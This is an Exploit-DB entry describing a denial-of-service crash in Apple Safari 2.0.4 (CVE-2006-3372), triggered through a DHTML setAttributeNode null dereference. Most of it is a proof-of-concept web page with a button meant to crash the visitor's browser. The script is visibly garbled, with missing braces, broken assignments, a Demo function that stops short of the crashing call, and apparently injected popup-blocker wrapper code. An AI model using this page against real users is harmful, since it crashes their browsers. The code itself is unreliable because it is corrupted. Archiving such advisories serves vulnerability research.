Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode Null Dereference Denial of Service Vulnerability

ID EDB-ID:28165
Type exploitdb
Reporter Dennis Cox
Modified 2006-07-05T00:00:00


Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial Of Service Vulnerability. CVE-2006-3372. Dos exploit for osx platform


Apple Safari web browser is prone to a denial-of-service vulnerability when parsing certain malformed DHTML elements.

An attacker can exploit this issue to crash an affected browser.

<script language="JavaScript">

function SymError()
  return true;

window.onerror = SymError;

var SymRealWinOpen =;

function SymWinOpen(url, name, attributes)
  return (new Object());
} = SymWinOpen;



// MoBB Demonstration
function Demo() {
	var a = document.createElement("a");


Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


<script language="JavaScript">
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{ = SymWinOpen;
  if(SymRealOnUnload != null)

function SymOnLoad()
  if(SymRealOnLoad != null)
     SymRealOnLoad(); = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;